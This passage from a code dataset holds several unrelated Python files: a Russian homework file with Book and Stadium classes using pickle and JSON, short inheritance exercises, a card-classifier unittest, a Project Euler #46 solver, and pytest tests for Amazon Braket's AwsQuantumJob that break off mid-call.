1986, 'Радио и связь', \"компьютерная литература\")\na_book.save_pikle(a_book, \"a_book.pkl\")\na_2book = Book.load_pikle(\"a_book.pkl\")\nprint(a_2book, type(a_2book))\nprint(b_book)\nb_book.save_JSON(b_book, \"b_book.json\")\nb2_book = Book.load_JSON(\"b_book.json\")\nprint(b2_book, type(b2_book))\n\n# ==============================================================================\n\nprint('\\n\\nЗадание 3. Реализуйте класс «Стадион».')\n\n\nclass Stadium(ItemsCollection):\n def __init__(self, name, city=None, country=None, year=None, capacity=None):\n self.name = name\n self.city = city\n self.country = country\n self.year = year\n self.capacity = capacity\n\n def set_info(self):\n self.name = input(\"Введите название: \")\n self.city = input(\"Введите город: \")\n self.country = input(\"Введите страну: \")\n self.year = input(\"Введите год открытия: \")\n self.capacity = input(\"Введите вместимость: \")\n\n def print_info(self):\n print(f'Стадион: {self.name}\\n\\t'\n f'город: {self.city}\\n\\t'\n f'страна: {self.country}\\n\\t'\n f'год открытия: {self.year}\\n\\t'\n f'вместимость: {self.capacity};')\n\n\nstad_1 = Stadium(\"Arena\", \"Saint-Petersburg\", \"Russia\", 2010, 250000)\nstad_1.save_pikle(stad_1, \"stad1.pkl\")\nstad2 = ItemsCollection.load_pikle(\"stad1.pkl\")\nstad2.print_info()\nprint(type(stad2))\n","repo_name":"GolubinM/homeWork","sub_path":"28/HomeWork_28.py","file_name":"HomeWork_28.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72315621993","text":"class One():\n def meth1 (self, a, b):\n print(\"Line 1 - User 1\")\n a.meth2()\n b.meth3()\n\nclass Two():\n def meth2(self):\n print(\"Line 2 - User 2\")\n\nclass Tree():\n def meth3(self):\n print(\"Line 3 - User 3\")\n\nobj1 = One()\nobj2 = Two()\nobj3 = Tree()\n\nobj1.meth1(obj2, obj3)\n\n_________________________________\nclass One():\n c = 10\n def meth (self, a, b):\n print(self.c + a + b)\n\nclass Two():\n def meth(self, a):\n self.meth = len(str(a))\n return self.meth\n\n\nobj1 = One()\nobj2 = Two()\n\nobj1.meth(45, 55)\nprint(obj2.meth(100))\n\n________________________________\nclass Base():\n def __init__ (self, variable):\n self.result = variable\n def out(self):\n self.result = self.result * 5\n print(self.result)\n\nclass SubClass(Base):\n def out(self):\n print(\"\\n---\")\n Base.out(self)\n print(\"---\")\n\nobj1 = Base(15)\nobj2 = SubClass(30)\n\nobj1.out()\nobj2.out()\n\n_____________________________________________\nclass Base:\n def __init__ (self, variable):\n self.result = variable\n def out(self):\n print(self.result)\n\nclass SubClass(Base):\n def multiple(self, z):\n self.result *= z\n print(\"---\")\n\nclass SubSubClass(SubClass):\n def devide(self, q):\n self.result /= q\n print(\"....\")\n def out(self):\n print(self.result*100)\n\nobj1 = Base(15)\nobj2 = SubClass(15)\nobj3 = SubSubClass(9)\n\nobj1.out()\nobj2.multiple(5)\nobj2.out()\nobj3.devide(3)\nobj3.multiple(2)\nobj3.out()\n","repo_name":"alisatsar/itstep","sub_path":"Python/Lessons/class/subClass.py","file_name":"subClass.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17634304890","text":"import os\nimport unittest\n\nimport ezplotly.settings as plotting_settings\nimport numpy as np\nfrom algo_ops.dependency.tester_util import clean_paths\nfrom algo_ops.ops.cv import ImageResult\nfrom algo_ops.ops.op import Op\nfrom ocr_ops.framework.op.result.ocr_result import OCRImageResult, OCRPipelineResult\nfrom ocr_ops.run_finding.interval import Interval\n\nfrom card_recognizer.classifier.core.card_prediction_result import (\n CardPredictionResult,\n CardPrediction,\n)\nfrom card_recognizer.classifier.core.word_classifier import WordClassifier\nfrom card_recognizer.reference.core.build import ReferenceBuild\n\n\nclass TestWordClassifier(unittest.TestCase):\n @staticmethod\n def _clean_env() -> None:\n clean_paths(\n dirs=(\"algo_ops_profile\",), files=(\"classify.txt\", \"classify_input.txt\")\n )\n\n def setUp(self) -> None:\n # suppress plotting\n plotting_settings.SUPPRESS_PLOTS = True\n\n # check that reference build has been set up\n self.master_model_pkl = ReferenceBuild.get_set_pkl_path(\n set_name=\"Brilliant Stars\"\n )\n self.assertTrue(os.path.exists(self.master_model_pkl))\n\n # setup input\n self.test_input = [\"Charizard\", \"fire\", \"burn\", \"fire\", \"spin\"]\n self._clean_env()\n\n def tearDown(self) -> None:\n self._clean_env()\n\n def test_end_to_end(self) -> None:\n \"\"\"\n Test end to end card prediction capability of WordClassifier.\n \"\"\"\n\n # init word classifier\n classifier = WordClassifier(ref_pkl_path=self.master_model_pkl)\n self.assertTrue(isinstance(classifier, Op))\n self.assertEqual(classifier.input, None)\n self.assertEqual(classifier.output, None)\n for method in (\n classifier.vis_profile,\n classifier.save_input,\n classifier.save_output,\n ):\n with self.assertRaises(ValueError):\n method()\n\n # test with test input List[str]\n output = classifier.exec(inp=[self.test_input])\n self.assertTrue(isinstance(classifier.input, list))\n self.assertTrue(isinstance(classifier.output, CardPredictionResult))\n self.assertEqual(classifier.input, [self.test_input])\n self.assertEqual(output, classifier.output)\n self.assertEqual(output.num_frames, 1)\n self.assertEqual(output.reference_set, \"Brilliant Stars\")\n self.assertEqual(output.unique_cards, [17])\n self.assertEqual(len(output), 1)\n self.assertTrue(isinstance(output[0], CardPrediction))\n self.assertEqual(output[0].card_index_in_reference, 17)\n self.assertEqual(output.input_path, None)\n\n # test vis and save input\n classifier.vis()\n classifier.vis_input()\n classifier.vis_profile()\n classifier.save_input()\n classifier.save_output()\n self.assertTrue(os.path.exists(\"classify.txt\"))\n self.assertTrue(os.path.exists(\"classify_input.txt\"))\n self.assertTrue(\n os.path.exists(os.path.join(\"algo_ops_profile\", \"classify.png\"))\n )\n\n # test input wrapped in OCRPipelineResult\n input_img = ImageResult(img=np.array([0.0]))\n ocr_image_results = [\n OCRImageResult.from_text_list(texts=self.test_input, input_img=input_img)\n ]\n ocr_pipeline_result = OCRPipelineResult(\n ocr_image_results=ocr_image_results, input_path=\"test.avi\"\n )\n output2 = classifier.exec(inp=ocr_pipeline_result)\n self.assertEqual(output2, classifier.output)\n self.assertEqual(output2.num_frames, 1)\n self.assertEqual(output2.reference_set, \"Brilliant Stars\")\n self.assertEqual(output2.unique_cards, [17])\n self.assertEqual(len(output2), 1)\n self.assertTrue(isinstance(output2[0], CardPrediction))\n self.assertEqual(output2[0].card_index_in_reference, 17)\n self.assertEqual(output2.input_path, \"test.avi\")\n\n def test_classify_multiple(self) -> None:\n \"\"\"\n Test classifying a run of length 2 of the same card.\n \"\"\"\n classifier = WordClassifier(ref_pkl_path=self.master_model_pkl)\n output = classifier.exec(inp=[self.test_input, self.test_input])\n self.assertTrue(isinstance(output, CardPredictionResult))\n self.assertEqual(len(output), 2)\n self.assertEqual(output.unique_cards, [17])\n self.assertEqual(len(output.runs), 1)\n self.assertEqual(output.runs[0].interval, Interval(start=0, end=2))\n self.assertEqual(output.runs[0].card_index, 17)\n self.assertEqual(output.input_path, None)\n","repo_name":"prateekt/pokemon-card-recognizer","sub_path":"card_recognizer/classifier/test/test_word_classifier.py","file_name":"test_word_classifier.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14201851531","text":"def efficientprime(number):\n if number <= 3:\n return number > 1\n elif number % 2 == 0 or number % 3 == 0:\n return False\n i = 5\n while i ** 2 <= number:\n if number % i == 0 or number % (i + 2) == 0:\n return False\n i += 6\n return True\n\n\nprimes = [2]\n\nfound = False\ni = 9\nwhile not found:\n n = max(primes)\n while max(primes) < i:\n n += 1\n primes.append(n) if efficientprime(n) else None\n\n abides = False\n for prime in primes[:len(primes)-1][::-1]:\n if (((i - prime) / 2) ** 0.5).is_integer():\n abides = True\n break\n\n if not abides:\n result = i\n found = False\n break\n else:\n i += 2\n while efficientprime(i):\n i += 2\n\nprint(\"Result: %s\" % result)\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#46 - Goldbach's Other Conjecture.py","file_name":"#46 - Goldbach's Other Conjecture.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23644741534","text":"import datetime\nimport json\nimport logging\nimport os\nimport re\nimport tarfile\nimport tempfile\nfrom unittest.mock import Mock, patch\n\nimport pytest\nfrom botocore.exceptions import ClientError\n\nfrom braket.aws import AwsQuantumJob, AwsSession\nfrom braket.aws.queue_information import HybridJobQueueInfo\n\n\n@pytest.fixture\ndef aws_session(quantum_job_arn, job_region):\n _aws_session = Mock(spec=AwsSession)\n _aws_session.create_job.return_value = quantum_job_arn\n _aws_session.default_bucket.return_value = \"default-bucket-name\"\n _aws_session.get_default_jobs_role.return_value = \"default-role-arn\"\n _aws_session.construct_s3_uri.side_effect = (\n lambda bucket, *dirs: f\"s3://{bucket}/{'/'.join(dirs)}\"\n )\n\n def fake_copy_session(region):\n _aws_session.region = region\n return _aws_session\n\n _aws_session.copy_session.side_effect = fake_copy_session\n _aws_session.list_keys.return_value = [\"job-path/output/model.tar.gz\"]\n _aws_session.region = job_region\n\n _braket_client_mock = Mock(meta=Mock(region_name=job_region))\n _aws_session.braket_client = _braket_client_mock\n return _aws_session\n\n\n@pytest.fixture\ndef generate_get_job_response():\n def _get_job_response(**kwargs):\n response = {\n \"ResponseMetadata\": {\n \"RequestId\": \"d223b1a0-ee5c-4c75-afa7-3c29d5338b62\",\n \"HTTPStatusCode\": 200,\n },\n \"algorithmSpecification\": {\n \"scriptModeConfig\": {\n \"entryPoint\": \"my_file:start_here\",\n \"s3Uri\": \"s3://amazon-braket-jobs/job-path/my_file.py\",\n }\n },\n \"checkpointConfig\": {\n \"localPath\": \"/opt/omega/checkpoints\",\n \"s3Uri\": \"s3://amazon-braket-jobs/job-path/checkpoints\",\n },\n \"createdAt\": datetime.datetime(2021, 6, 28, 21, 4, 51),\n \"deviceConfig\": {\n \"device\": \"arn:aws:braket:::device/qpu/rigetti/Aspen-10\",\n },\n \"hyperParameters\": {\n \"foo\": \"bar\",\n },\n \"inputDataConfig\": [\n {\n \"channelName\": \"training_input\",\n \"dataSource\": {\n \"s3DataSource\": {\n \"s3Uri\": \"s3://amazon-braket-jobs/job-path/input\",\n }\n },\n }\n ],\n \"instanceConfig\": {\n \"instanceCount\": 1,\n \"instanceType\": \"ml.m5.large\",\n \"volumeSizeInGb\": 1,\n },\n \"jobArn\": \"arn:aws:braket:us-west-2:875981177017:job/job-test-20210628140446\",\n \"jobName\": \"job-test-20210628140446\",\n \"outputDataConfig\": {\"s3Path\": \"s3://amazon-braket-jobs/job-path/data\"},\n \"roleArn\": \"arn:aws:iam::875981177017:role/AmazonBraketJobRole\",\n \"status\": \"RUNNING\",\n \"stoppingCondition\": {\"maxRuntimeInSeconds\": 1200},\n }\n response.update(kwargs)\n\n return response\n\n return _get_job_response\n\n\n@pytest.fixture\ndef generate_cancel_job_response():\n def _cancel_job_response(**kwargs):\n response = {\n \"ResponseMetadata\": {\n \"RequestId\": \"857b0893-2073-4ad6-b828-744af8400dfe\",\n \"HTTPStatusCode\": 200,\n },\n \"cancellationStatus\": \"CANCELLING\",\n \"jobArn\": \"arn:aws:braket:us-west-2:875981177017:job/job-test-20210628140446\",\n }\n response.update(kwargs)\n return response\n\n return _cancel_job_response\n\n\n@pytest.fixture\ndef quantum_job_name():\n return \"job-test-20210628140446\"\n\n\n@pytest.fixture\ndef job_region():\n return \"us-west-2\"\n\n\n@pytest.fixture\ndef quantum_job_arn(quantum_job_name, job_region):\n return f\"arn:aws:braket:{job_region}:875981177017:job/{quantum_job_name}\"\n\n\n@pytest.fixture\ndef quantum_job(quantum_job_arn, aws_session):\n return AwsQuantumJob(quantum_job_arn, aws_session)\n\n\ndef test_equality(quantum_job_arn, aws_session, job_region):\n new_aws_session = Mock(region=job_region)\n quantum_job_1 = AwsQuantumJob(quantum_job_arn, aws_session)\n quantum_job_2 = AwsQuantumJob(quantum_job_arn, aws_session)\n quantum_job_3 = AwsQuantumJob(quantum_job_arn, new_aws_session)\n other_quantum_job = AwsQuantumJob(\n \"arn:aws:braket:us-west-2:875981177017:job/other-job\", aws_session\n )\n non_quantum_job = quantum_job_1.arn\n\n assert quantum_job_1 == quantum_job_2\n assert quantum_job_1 == quantum_job_3\n assert quantum_job_1 is not quantum_job_2\n assert quantum_job_1 is not quantum_job_3\n assert quantum_job_1 is quantum_job_1\n assert quantum_job_1 != other_quantum_job\n assert quantum_job_1 != non_quantum_job\n\n\ndef test_hash(quantum_job):\n assert hash(quantum_job) == hash(quantum_job.arn)\n\n\n@pytest.mark.parametrize(\n \"arn, expected_region\",\n [\n (\"arn:aws:braket:us-west-2:875981177017:job/job-name\", \"us-west-2\"),\n (\"arn:aws:braket:us-west-1:1234567890:job/job-name\", \"us-west-1\"),\n ],\n)\n@patch(\"braket.aws.aws_quantum_job.boto3.Session\")\n@patch(\"braket.aws.aws_quantum_job.AwsSession\")\ndef test_quantum_job_constructor_default_session(\n aws_session_mock, mock_session, arn, expected_region\n):\n mock_boto_session = Mock()\n aws_session_mock.return_value = Mock()\n mock_session.return_value = mock_boto_session\n job = AwsQuantumJob(arn)\n mock_session.assert_called_with(region_name=expected_region)\n aws_session_mock.assert_called_with(boto_session=mock_boto_session)\n assert job.arn == arn\n assert job._aws_session == aws_session_mock.return_value\n\n\ndef test_quantum_job_constructor_invalid_region(aws_session):\n region_mismatch = \"The aws session region does not match the region for the supplied arn.\"\n arn = \"arn:aws:braket:unknown-region:875981177017:job/quantum_job_name\"\n with pytest.raises(ValueError, match=region_mismatch):\n AwsQuantumJob(arn, aws_session)\n\n\n@patch(\"braket.aws.aws_quantum_job.boto3.Session\")\ndef test_quantum_job_constructor_explicit_session(mock_session, quantum_job_arn, job_region):\n aws_session_mock = Mock(region=job_region)\n job = AwsQuantumJob(quantum_job_arn, aws_session_mock)\n assert job._aws_session == aws_session_mock\n assert job.arn == quantum_job_arn\n mock_session.assert_not_called()\n\n\ndef test_metadata(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n get_job_response_running = generate_get_job_response(status=\"RUNNING\")\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.metadata() == get_job_response_running\n aws_session.get_job.assert_called_with(quantum_job_arn)\n\n get_job_response_completed = generate_get_job_response(status=\"COMPLETED\")\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.metadata() == get_job_response_completed\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 2\n\n\ndef test_metadata_caching(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n get_job_response_running = generate_get_job_response(status=\"RUNNING\")\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.metadata(True) == get_job_response_running\n\n get_job_response_completed = generate_get_job_response(status=\"COMPLETED\")\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.metadata(True) == get_job_response_running\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 1\n\n\ndef test_queue_position(quantum_job, aws_session, generate_get_job_response):\n state_1 = \"COMPLETED\"\n queue_info = {\n \"queue\": \"JOBS_QUEUE\",\n \"position\": \"None\",\n \"message\": \"Job is in COMPLETED status. \"\n \"AmazonBraket does not show queue position for this status.\",\n }\n get_job_response_completed = generate_get_job_response(status=state_1, queueInfo=queue_info)\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.queue_position() == HybridJobQueueInfo(\n queue_position=None, message=queue_info[\"message\"]\n )\n\n state_2 = \"QUEUED\"\n queue_info = {\"queue\": \"JOBS_QUEUE\", \"position\": \"2\"}\n get_job_response_queued = generate_get_job_response(status=state_2, queueInfo=queue_info)\n aws_session.get_job.return_value = get_job_response_queued\n assert quantum_job.queue_position() == HybridJobQueueInfo(queue_position=\"2\", message=None)\n\n\ndef test_state(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n state_1 = \"RUNNING\"\n get_job_response_running = generate_get_job_response(status=state_1)\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.state() == state_1\n aws_session.get_job.assert_called_with(quantum_job_arn)\n\n state_2 = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state_2)\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.state() == state_2\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 2\n\n\ndef test_state_caching(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n state_1 = \"RUNNING\"\n get_job_response_running = generate_get_job_response(status=state_1)\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.state(True) == state_1\n\n state_2 = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state_2)\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.state(True) == state_1\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 1\n\n\n@pytest.fixture()\ndef result_setup(quantum_job_name):\n with tempfile.TemporaryDirectory() as temp_dir:\n os.chdir(temp_dir)\n file_path = \"results.json\"\n\n with open(file_path, \"w\") as write_file:\n write_file.write(\n json.dumps(\n {\n \"braketSchemaHeader\": {\n \"name\": \"braket.jobs_data.persisted_job_data\",\n \"version\": \"1\",\n },\n \"dataDictionary\": {\"converged\": True, \"energy\": -0.2},\n \"dataFormat\": \"plaintext\",\n }\n )\n )\n\n with tarfile.open(\"model.tar.gz\", \"w:gz\") as tar:\n tar.add(file_path, arcname=os.path.basename(file_path))\n\n yield\n\n result_dir = f\"{os.getcwd()}/{quantum_job_name}\"\n\n if os.path.exists(result_dir):\n os.remove(f\"{result_dir}/results.json\")\n os.rmdir(f\"{result_dir}/\")\n\n if os.path.isfile(\"model.tar.gz\"):\n os.remove(\"model.tar.gz\")\n\n os.chdir(\"..\")\n\n\n@pytest.mark.parametrize(\"state\", sorted(AwsQuantumJob.TERMINAL_STATES))\ndef test_results_when_job_is_completed(\n quantum_job, aws_session, generate_get_job_response, result_setup, state\n):\n expected_saved_data = {\"converged\": True, \"energy\": -0.2}\n\n get_job_response_completed = generate_get_job_response(status=state)\n quantum_job._aws_session.get_job.return_value = get_job_response_completed\n actual_data = quantum_job.result()\n\n job_metadata = quantum_job.metadata(True)\n s3_path = job_metadata[\"outputDataConfig\"][\"s3Path\"]\n\n output_bucket_uri = f\"{s3_path}/output/model.tar.gz\"\n quantum_job._aws_session.download_from_s3.assert_called_with(\n s3_uri=output_bucket_uri, filename=\"model.tar.gz\"\n )\n assert actual_data == expected_saved_data\n\n\ndef test_download_result_when_job_is_running(\n quantum_job, aws_session, generate_get_job_response, result_setup\n):\n poll_timeout_seconds, poll_interval_seconds, state = 1, 0.5, \"RUNNING\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n\n with pytest.raises(\n TimeoutError,\n match=f\"{job_metadata['jobName']}: Polling for job completion \"\n f\"timed out after {poll_timeout_seconds} seconds.\",\n ):\n quantum_job.download_result(\n poll_timeout_seconds=poll_timeout_seconds, poll_interval_seconds=poll_interval_seconds\n )\n\n\ndef test_download_result_when_extract_path_not_provided(\n quantum_job, generate_get_job_response, aws_session, result_setup\n):\n state = \"COMPLETED\"\n expected_saved_data = {\"converged\": True, \"energy\": -0.2}\n get_job_response_completed = generate_get_job_response(status=state)\n quantum_job._aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n job_name = job_metadata[\"jobName\"]\n quantum_job.download_result()\n\n with open(f\"{job_name}/results.json\", \"r\") as file:\n actual_data = json.loads(file.read())[\"dataDictionary\"]\n assert expected_saved_data == actual_data\n\n\ndef test_download_result_when_extract_path_provided(\n quantum_job, generate_get_job_response, aws_session, result_setup\n):\n expected_saved_data = {\"converged\": True, \"energy\": -0.2}\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n job_name = job_metadata[\"jobName\"]\n\n with tempfile.TemporaryDirectory() as temp_dir:\n quantum_job.download_result(temp_dir)\n\n with open(f\"{temp_dir}/{job_name}/results.json\", \"r\") as file:\n actual_data = json.loads(file.read())[\"dataDictionary\"]\n assert expected_saved_data == actual_data\n\n\ndef test_empty_dict_returned_when_result_not_saved(\n quantum_job, generate_get_job_response, aws_session\n):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n\n exception_response = {\n \"Error\": {\n \"Code\": \"404\",\n \"Message\": \"Not Found\",\n }\n }\n quantum_job._aws_session.download_from_s3 = Mock(\n side_effect=ClientError(exception_response, \"HeadObject\")\n )\n assert quantum_job.result() == {}\n\n\ndef test_results_not_in_s3_for_download(quantum_job, generate_get_job_response, aws_session):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n output_s3_path = job_metadata[\"outputDataConfig\"][\"s3Path\"]\n\n error_message = f\"Error retrieving results, could not find results at '{output_s3_path}\"\n\n exception_response = {\n \"Error\": {\n \"Code\": \"404\",\n \"Message\": \"Not Found\",\n }\n }\n quantum_job._aws_session.download_from_s3 = Mock(\n side_effect=ClientError(exception_response, \"HeadObject\")\n )\n with pytest.raises(ClientError, match=error_message):\n quantum_job.download_result()\n\n\ndef test_results_raises_error_for_non_404_errors(\n quantum_job, generate_get_job_response, aws_session\n):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n\n error = \"An error occurred \\\\(402\\\\) when calling the SomeObject operation: Something\"\n\n exception_response = {\n \"Error\": {\n \"Code\": \"402\",\n \"Message\": \"Something\",\n }\n }\n quantum_job._aws_session.download_from_s3 = Mock(\n side_effect=ClientError(exception_response, \"SomeObject\")\n )\n with pytest.raises(ClientError, match=error):\n quantum_job.result()\n\n\n@patch(\"braket.aws.aws_quantum_job.AwsQuantumJob.download_result\")\ndef test_results_json_file_not_in_tar(\n result_download, quantum_job, aws_session, generate_get_job_response\n):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n quantum_job._aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.result() == {}\n\n\n@pytest.fixture\ndef entry_point():\n return \"test-source-module.entry_point:func\"\n\n\n@pytest.fixture\ndef bucket():\n return \"braket-region-id\"\n\n\n@pytest.fixture(\n params=[\n None,\n \"aws.location/custom-jobs:tag.1.2.3\",\n \"other.uri/custom-name:tag\",\n \"other-custom-format.com\",\n ]\n)\ndef image_uri(request):\n return request.param\n\n\n@pytest.fixture(params=[\"given_job_name\", \"default_job_name\"])\ndef job_name(request):\n if request.param == \"given_job_name\":\n return \"test-job-name\"\n\n\n@pytest.fixture\ndef s3_prefix(job_name):\n return f\"{job_name}/non-default\"\n\n\n@pytest.fixture(params=[\"local_source\", \"s3_source\"])\ndef source_module(request, bucket, s3_prefix):\n if request.param == \"local_source\":\n return \"test-source-module\"\n elif request.param == \"s3_source\":\n return AwsSession.construct_s3_uri(bucket, \"test-source-prefix\", \"source.tar.gz\")\n\n\n@pytest.fixture\ndef role_arn():\n return \"arn:aws:iam::0000000000:role/AmazonBraketInternalSLR\"\n\n\n@pytest.fixture(\n params=[\n \"arn:aws:braket:us-west-2::device/qpu/test/device-name\",\n \"arn:aws:braket:::device/qpu/test/device-name\",\n ]\n)\ndef device_arn(request):\n return request.param\n\n\n@pytest.fixture\ndef reservation_arn():\n return \"arn:aws:braket:us-west-2:123456789123:reservation/a1b123cd-45e6-789f-gh01-i234567jk8l9\"\n\n\n@pytest.fixture\ndef prepare_job_args(aws_session, device_arn, reservation_arn):\n return {\n \"device\": device_arn,\n \"source_module\": Mock(),\n \"entry_point\": Mock(),\n \"image_uri\": Mock(),\n \"job_name\": Mock(),\n \"code_location\": Mock(),\n \"role_arn\": Mock(),\n \"hyperparameters\": Mock(),\n \"input_data\": Mock(),\n \"instance_config\": Mock(),\n \"distribution\": Mock(),\n \"stopping_condition\": Mock(),\n \"output_data_config\": Mock(),\n \"copy_checkpoints_from_job\": Mock(),\n \"checkpoint_config\": Mock(),\n \"aws_session\": aws_session,\n \"tags\": Mock(),\n \"reservation_arn\": reservation_arn,\n }\n\n\ndef test_str(quantum_job):\n expected = f\"AwsQuantumJob('arn':'{quantum_job.arn}')\"\n assert str(quantum_job) == expected\n\n\ndef test_arn(quantum_job_arn, aws_session):\n quantum_job = AwsQuantumJob(quantum_job_arn, aws_session)\n assert quantum_job.arn == quantum_job_arn\n\n\ndef test_name(quantum_job_arn, quantum_job_name, aws_session):\n quantum_job = AwsQuantumJob(quantum_job_arn, aws_session)\n assert quantum_job.name == quantum_job_name\n\n\ndef test_no_arn_setter(quantum_job):\n # Python 3.11 error output differs from Python 3.10 <=\n with pytest.raises(AttributeError):\n quantum_job.arn = 123\n\n\n@pytest.mark.parametrize(\"wait_until_complete\", [True, False])\n@patch(\"braket.aws.aws_quantum_job.AwsQuantumJob.logs\")\n@patch(\"braket.aws.aws_quantum_job.prepare_quantum_job\")\ndef test_create_job(\n mock_prepare_quantum_job,\n mock_logs,\n aws_session,\n prepare_job_args,\n quantum_job_arn,\n wait_until_complete,\n):\n test_response_args = {\"testArgs\": \"MyTestArg\"}\n mock_prepare_quantum_job.return_value = test_response_args\n job = AwsQuantumJob.create(wait_until_complete=wait_until_complete, **prepare_job_args)\n mock_prepare_quantum_job.assert_called_with(**prepare_job_args)\n aws_session.create_job.assert_called_with(**test_response_args)\n if wait_until_complete:\n mock_logs.assert_called_once()\n else:\n mock_logs.assert_not_called()\n assert job.arn == quantum_job_arn\n\n\ndef test_create_fake_arg():\n unexpected_kwarg = \"create\\\\(\\\\) got an unexpected keyword argument 'fake_arg'\"\n with pytest.raises(TypeError, match=unexpected_kwarg):\n AwsQuantumJob.create(\n device=\"device\",\n source_module=\"source\",\n fake_arg=\"fake_value\",\n )\n\n\ndef test_cancel_job(quantum_job_arn, aws_session, generate_cancel_job_response):\n cancellation_status = \"CANCELLING\"\n aws_session.cancel_job.return_value = generate_cancel_job_response(\n cancellationStatus=cancellation_status\n )\n quantum_job = AwsQuantumJob(quantum_job_arn, aws_session)\n status = quantum_job.cancel()\n aws_session.cancel_job.assert_called_with(quantum_job_arn)\n assert status == cancellation_status\n\n\ndef test_cancel_job_surfaces_exception(quantum_job, aws_session):\n exception_response = {\n \"Error\": {\n \"Code\": \"ValidationException\",\n \"Message\": \"unit-test-error\",\n }\n }\n error_string = re.escape(\n \"An error occurred (ValidationException) when calling the \"\n \"cancel_job operation: unit-test-error\"\n )\n aws_session.cancel_job.side_effect = ClientError(exception_response, \"cancel_job\")\n with pytest.raises(ClientError, match=error_string):\n quantum_job.cancel()\n\n\n@pytest.mark.parametrize(\n \"generate_get_job_response_kwargs\",\n [\n {\n \"status\": \"RUNNING\",\n },\n {\n \"status\": \"COMPLETED\",\n },\n {\n \"status\": \"COMPLETED\",\n \"startedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0),\n },\n {\"status\": \"COMPLETED\", \"endedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0)},\n {\n \"status\": \"COMPLETED\",\n \"startedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0),\n \"endedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0),\n },\n ],\n)\n@patch(\n \"braket.jobs.metrics_data.cwl_insights_metrics_fetcher.\"\n \"CwlInsightsMetricsFetcher.get_metrics_for_job\"\n)\ndef test_metrics(\n metrics_fetcher_mock,\n quantum_job,\n aws_session,\n generate_get_job_response,\n generate_get_job_response_kwargs,\n):\n get_job_response_running = generate_get_job_response(**generate_get_job_response_kwargs)\n aws_session.get_job.return_value = get_job_response_running\n\n expected_metrics = {\"Test\": [1]}\n metrics_fetcher_mock.return_value = expected_metrics\n metrics = quantum_job.metrics()\n assert metrics == expected_metrics\n\n\n@pytest.fixture\ndef log_stream_responses():\n return (\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n \"Message\": \"This shouldn't get raised...\",\n }\n },\n \"DescribeLogStreams\",\n ),\n {\"logStreams\": []},\n {\"logStreams\": [{\"logStreamName\": \"stream-1\"}]},\n )\n\n\n@pytest.fixture\ndef log_events_responses():\n return (\n {\"nextForwardToken\": None, \"events\": [{\"timestamp\": 1, \"message\": \"hi there #1\"}]},\n {\"nextForwardToken\": None, \"events\": []},\n {\n \"nextForwardToken\": None,\n \"events\": [\n {\"timestamp\": 1, \"message\": \"hi there #1\"},\n {\"timestamp\": 2, \"message\": \"hi there #2\"},\n ],\n },\n {\"nextForwardToken\": None, \"events\": []},\n {\n \"nextForwardToken\": None,\n \"events\": [\n {\"timestamp\": 2, \"message\": \"hi there #2\"},\n {\"timestamp\": 2, \"message\": \"hi there #2a\"},\n {\"timestamp\": 3, \"message\": \"hi there #3\"},\n ],\n },\n {\"nextForwardToken\": None, \"events\": []},\n )\n\n\ndef test_logs(\n quantum_job,\n generate_get_job_response,\n log_events_responses,\n log_stream_responses,\n capsys,\n):\n quantum_job._aws_session.get_job.side_effect = (\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"COMPLETED\"),\n )\n quantum_job._aws_session.describe_log_streams.side_effect = log_stream_responses\n quantum_job._aws_session.get_log_events.side_effect = log_events_responses\n\n quantum_job.logs(wait=True, 